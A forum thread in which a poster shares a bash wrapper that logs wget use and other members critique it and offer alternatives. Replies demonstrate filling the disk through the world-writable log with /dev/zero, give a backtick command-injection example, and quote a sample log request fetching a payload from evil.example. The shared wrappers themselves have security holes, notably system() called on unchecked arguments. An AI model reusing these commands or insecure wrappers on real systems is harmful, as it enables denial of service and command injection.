  1. #1
    Join Date
    Jan 2005
    Location
    Scotland, UK
    Posts
    2,681

    Log Wget Commands

    Logging wget commands is a simple process. Remember you will have to set permissions on the binaries along with the directory; you don't want people looking to see what the new file is called. Generally, this is an excellent way to pick up problems, because most attacks nowadays are automated and do not put checks in place.

    What this simple but useful script does is this: first you move the wget binary to a new file name; for extra security you can even move it to a completely different directory. Please remember your wget path will differ from distro to distro; get the path by typing `whereis wget`.

    Now, let's move our wget to a new name; for this example I chose ekigrowbwo. On my specific distro, wget is located in /usr/bin/wget.

    To move it we use the mv command; for more information on this command please read the man page, `man mv`:

    mv /usr/bin/wget /usr/bin/ekigrowbwo

    This renames wget to /usr/bin/ekigrowbwo. Now all we have to do is create our own wget script in its place, so just open it up with pico:
    pico /usr/bin/wget

    Now place this simple script inside

    #!/bin/bash
    ME=`whoami`
    TIME=`date`
    DIR=`pwd`
    echo "$TIME - $ME - $1 - >> $DIR" >> /usr/bin/wget.log
    /usr/bin/ekigrowbwo $1

    Save and exit (Ctrl+X).

    Now you should have a simple script in place of your wget binary. Next, create the log file; the script logs to /usr/bin/wget.log, so just create that with the touch command:

    touch /usr/bin/wget.log
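    The whole procedure can be sketched end to end. To keep the sketch safe to run, this version builds everything in a temporary directory and uses a harmless stand-in in place of the real wget binary; the file names and the wrapper script itself follow the guide above.

    ```shell
    #!/bin/sh
    # Sandbox demo of the wrapper technique: nothing in /usr/bin is touched.
    set -e
    DEMO=$(mktemp -d)

    # Step 1: the renamed "real" binary (a stand-in that echoes its argument)
    printf '#!/bin/sh\necho "fetched: $1"\n' > "$DEMO/ekigrowbwo"
    chmod 755 "$DEMO/ekigrowbwo"

    # Step 2: the logging wrapper installed under the original name
    cat > "$DEMO/wget" <<EOF
    #!/bin/bash
    ME=\$(whoami)
    TIME=\$(date)
    DIR=\$(pwd)
    echo "\$TIME - \$ME - \$1 - >> \$DIR" >> $DEMO/wget.log
    $DEMO/ekigrowbwo \$1
    EOF
    chmod 755 "$DEMO/wget"

    # Step 3: the log file, world-writable so any user can append to it
    touch "$DEMO/wget.log"
    chmod 666 "$DEMO/wget.log"

    # Try it out
    "$DEMO/wget" http://www.google.com
    cat "$DEMO/wget.log"
    ```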

    That's you all done; you have now created a simple yet effective wget script. Test it by typing `wget http://www.google.com`, then `cat /usr/bin/wget.log`; you should see what was downloaded, when, where, and by whom.

    I hope this helps you.
    -Written by HostGeekZ.com
    http://www.hostgeekz.com/guides/cPan...t_Commands.htm
    Server Management - AdminGeekZ.com
    Infrastructure Management, Web Application Performance, mySQL DBA. System Automation.
    WordPress/Magento Performance, Apache to Nginx Conversion, Varnish Implementation, DDoS Protection, Custom Nginx Modules
    Check our wordpress varnish plugin. Contact us for quote: sales@admingeekz.com

  2. #2
    Excellent! Thanks very much for this. I have been spending a lot of time in log files, among other things, trying to find out who might be using the wget command. I also wish there were an easier way to find out where the junk found in the /tmp folder comes from.

    Thanks again and I'll give this a try.

  3. #3
    Join Date
    Jan 2005
    Location
    Scotland, UK
    Posts
    2,681
    Most of the "junk" found in /tmp comes from webshells nowadays.

    Just get the file name, then go to your Apache logs directory. For cPanel users this is /usr/local/apache/domlogs.

    Just run

    cat * | grep filename

    Then you have both what they exploited and what was "wgeted".
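    That search can be sketched with stand-in data so the commands can be tried anywhere; the sample log line and the "r0nin" file name are assumptions standing in for a real domlogs directory:

    ```shell
    # Simulate a domlogs directory with one vhost access log; in real use
    # you would cd to /usr/local/apache/domlogs instead.
    LOGS=$(mktemp -d)
    cat > "$LOGS/example.com" <<'EOF'
    1.2.3.4 - - [10/Jul/2005:17:50:55 -0400] "GET /cgi-bin/vuln.cgi?cmd=wget%20http://evil.example/r0nin HTTP/1.1" 200 512
    5.6.7.8 - - [10/Jul/2005:17:51:17 -0400] "GET /index.html HTTP/1.1" 200 1024
    EOF

    cd "$LOGS"
    grep -l r0nin *    # -l names the log file, i.e. which site was hit
    grep r0nin *       # the full request shows what was "wgeted"
    ```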

  4. #4
    Join Date
    Jul 2005
    Posts
    67
    I really feel kind of bad pointing this out, but that doesn't stop anyone from uploading their own copy of wget and running it in their own home directory. It most definitely doesn't stop users from connecting to remote servers via CGI scripts or local applications. Additionally, there are a plethora of other commands that have "wget functionality." For example, fetch, ncftp, and the lynx text browser with the correct "just dump it here" flags.

    Additionally, the 'wget' program runs as the user executing it. This means that any log file you create is going to have to be world writable. Once that's done, there is nothing stopping *any* user from simply removing that file (never mind the fact that the wget wrapper is by nature world readable).

    Limiting the command is superficial. The real goal should be hardening the system to the point that it doesn't matter *what* they download.

    If anyone is really interested in logging commands that are run by users, look into standard Unix process logging.
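    For reference, classic BSD-style process accounting (the acct/psacct package on most distributions) records every command every user runs. A rough sketch of turning it on, assuming root and a typical accounting-file path (the path varies by distro):

    ```shell
    # Enable kernel process accounting and query it. Run as root; the
    # accounting file location (/var/account/pacct) is an assumption.
    touch /var/account/pacct
    accton /var/account/pacct   # start recording every command executed
    wget http://www.google.com  # ...commands run now are recorded
    lastcomm wget               # list recorded wget executions, with user and tty
    accton                      # no argument: turn accounting back off
    ```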

  5. #5
    Join Date
    Oct 2003
    Posts
    570
    Additionally, the script quoted above effectively strips all parameters passed to wget except the first one. And there's actually no need to upload your own wget binary, since the location of the "true" binary is plainly visible: the script has to be readable, because the bash interpreter running with the user's rights needs to parse it.
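    The parameter-stripping point is easy to demonstrate with a throwaway script (created here just for illustration): $1 holds only the first argument, while "$@" preserves the whole command line.

    ```shell
    # Show the difference between $1 and "$@" in a wrapper script.
    wrapper=$(mktemp)
    cat > "$wrapper" <<'EOF'
    #!/bin/bash
    echo "via \$1 : $1"
    echo "via \$@ : $@"
    EOF
    chmod 755 "$wrapper"

    "$wrapper" -q -O page.html http://www.google.com
    # A wrapper that passes on only $1 would run the real binary with just
    # "-q", silently dropping the -O flag and the URL itself.
    ```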

    Calling the renaming of a binary a "security measure" is quite a perversion of the term, by the way.

    Actually you would achieve quite the opposite, since your users would be given permission to corrupt your server by filling up your /usr partition with crap, because, as mentioned before, the log file has to be world-writable.

    Try

    cp /dev/zero /usr/bin/wget.log

    and wait a few minutes to see what I mean ;-).

    By the way, deleting the file wouldn't be possible for users but nothing would prevent them from overwriting it with /dev/null as opposed to /dev/zero ;-).

    If you found a way to let your script run as a different user, it would make things even worse, since there are no input checks: passing commands in backticks would allow you to execute arbitrary commands with the script's full user rights.

    Like

    yourscript "`cd $HOME >/dev/null; ls -l >/tmp/foo.bar; chmod 666 /tmp/foo.bar >/dev/null`"

    The "script" wouldn't even log anything in that case, since the above does not generate any output on STDOUT.

    Edit: Just saw that the "script author" is actually offering hosting and is even displaying this so called "guide" on his page. Did I miss something? Is all of this part of some kind of kiddie host joke?
    Last edited by aldee; 07-10-2005 at 01:27 PM.

  6. #6
    Join Date
    Jan 2005
    Location
    Scotland, UK
    Posts
    2,681
    Firstly, I am not a host.

    Second I clearly stated that it is not very good.

    Instead of all your lame *** attempts at going on about what it actually does, I also clearly stated, and I quote:

    "due to the fact most attacks nowadays are automated and do not put checks in place."

    Where on earth does it say that running this will keep your server secure? Go on, tell me.

    "Did I miss something? Is all of this part of some kind of kiddie host joke?"

    Again I state I am not a host, nor do I even offer any sort of webhosting. So get your facts right; you are clearly stupid if you thought it was a webhost, to put it bluntly.

    It was one of the ways to pick up the r0nin exploit especially quickly without checking Apache logs.

    So you try to come into a thread, rant about things I never stated it will do, for what? To think you know everything?

    Quite frankly, I do not appreciate your comments, because I have never once stated it will do much; it is also clearly stated that it is for automated attempts.

    So in future, read what was said before going on your idiotic rants.

    -Scott

  7. #7
    Join Date
    Oct 2003
    Posts
    570
    The point is not that it doesn't secure your server; it is that it opens your server up to DoS attacks from local users (or compromised user accounts) by granting them permission to fill up your /usr partition, and that it cripples the use of wget for legitimate users, since $1 - as opposed to $* - only contains the first command-line parameter passed to the script.

    Posting something like this in a forum that might be read by people who could potentially make use of the script is grossly negligent.

    And frankly, I did not comment on this thread to earn your appreciation.

    EOD as far as I am concerned.

  8. #8
    Join Date
    Jan 2005
    Location
    Scotland, UK
    Posts
    2,681
    It does not give permission over the full /usr partition.

    It clearly states 1, and I repeat, 1!! log file.

    It only logs the first string because if you ever look at what passes through, 90% of the time it is one string, nothing more. You can change it to read all strings if you wish, but very rarely will you find automated attempts with switches and more than one URL.

    -Scott

  9. #9
    Join Date
    Jul 2005
    Posts
    67
    HG - his point is this..

    cat /dev/zero >> /usr/bin/wget.log... that command, run by any user, would fill up the /usr partition. Depending on how you have your system configured, it could fill up your entire drive. Watch:

    [root@marvin jeff]# touch /usr/bin/wget.log
    [root@marvin jeff]# chmod 777 /usr/bin/wget.log
    [root@marvin jeff]# exit
    [jeff@marvin ~]$ id
    uid=500(jeff) gid=500(jeff) groups=500(jeff) context=user_u:system_r:unconfined_t
    [jeff@marvin ~]$ date
    Sun Jul 10 17:50:55 EDT 2005
    [jeff@marvin ~]$ ls -al /usr/bin/wget.log
    -rwxrwxrwx 1 root root 0 Jul 10 17:50 /usr/bin/wget.log
    [jeff@marvin ~]$ cat /dev/zero > /usr/bin/wget.log

    [jeff@marvin ~]$ ls -alh /usr/bin/wget.log
    -rwxrwxrwx 1 root root 341M Jul 10 17:51 /usr/bin/wget.log
    [jeff@marvin ~]$ date
    Sun Jul 10 17:51:17 EDT 2005
    [jeff@marvin ~]$

    The point is that by adding the logging functionality, you're at the same time opening a bigger hole. While someone MIGHT take your machine offline with something they download over HTTP, they *WILL* take your machine offline if they can fill up your file systems.

    By not accepting more than one argument, you'll almost guarantee that users will find your script. If a user passes a flag to wget and gets a strange error, they're going to explore that a bit.

    I'm not attacking you, I just want to make sure it's clear that individuals following this tip might be setting themselves up for some pain without realizing it.

    If execution logging is important to you, look into process logging.

    Look, it's great that you want to help out a community; many folks couldn't care less. But be aware that *many* people will follow what you've typed up verbatim, and they will take what you say as gospel, especially when you run a site full of tips and tutorials.

    -Jeff

  10. #10
    Join Date
    Jan 2005
    Location
    Scotland, UK
    Posts
    2,681
    I understand what you are talking about, but you are all still missing the basic point of it. It was something I wrote up on the spot; it was just a crap idea I had at the time, just like the rest of the guides I make.

    It's for automated attempts. You say they can just fill up the partition; well, if someone has access, I'm afraid they are going to do a lot worse than that anyway. Not to mention, I have never ONCE seen anyone look at /usr/bin/wget or the relevant path.

  11. #11
    Join Date
    Jul 2005
    Posts
    67
    Then, please, do everyone a favor and ensure you mention that there are inherent risks with doing this type of thing this way.

  12. #12
    Join Date
    Jan 2005
    Location
    Scotland, UK
    Posts
    2,681
    You say that now. Look at a lot of things around here; there are ALWAYS risks.

    It just depends on how you deal with it.

  13. #13
    Join Date
    Jul 2005
    Posts
    67
    I'm not going to bicker back and forth with you. I've made every effort to point out issues I've seen in your work with a very high level of respect. It wasn't me that replied in an aggressive manner.

    The bottom line here is that you are doing a disservice to the hosting community by taking an authoritative stance on a topic and dispensing misleading information. If you're comfortable taking that approach, I'm comfortable with letting you do it.

  14. #14
    Join Date
    Jan 2005
    Location
    Scotland, UK
    Posts
    2,681
    I have read over what I have been saying, and I do not mean to come across like that, although I have been like it all day for some reason.

    I totally understand what you are saying, but I am too stubborn to agree with you 100%, because I have my own point of view.

    I guess it's up to the person to decide.

    -Scott

  15. #15
    Join Date
    Apr 2003
    Location
    UK
    Posts
    2,569
    A better, more foolproof way is to use a kernel-level tool such as grsec to log execution, and run something like "grep wget messages" to get the wget commands from the log.
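    That grep can be sketched against stand-in data; the exact grsec log format below is an assumption for illustration (it varies by version and configuration), but the search works the same against a real /var/log/messages:

    ```shell
    # Stand-in for /var/log/messages with grsec-style exec-logging lines
    # (format is an approximation; real output depends on the grsec version).
    MSGS=$(mktemp)
    cat > "$MSGS" <<'EOF'
    Jul 10 17:50:55 marvin kernel: grsec: exec of /usr/bin/wget (wget http://evil.example/r0nin ) by /bin/bash[bash:1234] uid/euid:500/500
    Jul 10 17:51:02 marvin kernel: grsec: exec of /bin/ls (ls -l ) by /bin/bash[bash:1234] uid/euid:500/500
    EOF

    # On a real box this would be: grep wget /var/log/messages
    grep wget "$MSGS"
    ```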

  16. #16
    Join Date
    Jun 2003
    Posts
    976
    What about using logger + syslogd for logging instead of your own logging system? It should at least prevent users from filling up the log file: read/write access is prohibited, and syslogd does some input throttling.
    Code:
    #!/bin/bash
    /bin/logger -t wget -p local0.notice -- "$LOGNAME/$UID - $PWD : $*"
    /usr/bin/wget "$@"
    Create the log file:
    Code:
    touch /var/log/wget
    chmod 640 /var/log/wget
    and add
    Code:
    local0.notice                           -/var/log/wget
    to /etc/syslog.conf or equivalent file

  17. #17

    Would something like this be OK?

    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>
    #include <time.h>
    #include <unistd.h>
    #include <pwd.h>
    #include <sys/types.h>
    #include <string>

    using namespace std;

    int main(int nArg, char* pszArgs[])
    {
    string myCommand = "xwgt"; // the renamed wget binary

    // Current working directory
    char cwd[260];
    if (!getcwd(cwd, sizeof(cwd)))
    cwd[0] = '\0';

    // Timestamp, with ctime's trailing newline stripped
    time_t tim = time(NULL);
    char *curTime = ctime(&tim);
    curTime[strlen(curTime) - 1] = 0;

    // User name from the real uid
    struct passwd *pwd;
    const char *username = "unknown";
    if ((pwd = getpwuid(getuid())))
    username = pwd->pw_name;
    else
    perror("onoes!");

    string logStr = curTime;
    logStr += " user[";
    logStr += username;
    logStr += "] cwd[";
    logStr += cwd;
    logStr += "] ";

    // Append every argument, not just the first two
    for (int i = 1; i < nArg; i++)
    {
    myCommand += " ";
    myCommand += pszArgs[i];
    }

    FILE *pFile = fopen("/var/log/wget", "at");
    if (pFile != NULL)
    {
    fputs(logStr.c_str(), pFile);
    fputs(myCommand.c_str(), pFile);
    fputs("\n", pFile);
    fclose(pFile);
    }

    return system(myCommand.c_str());
    }
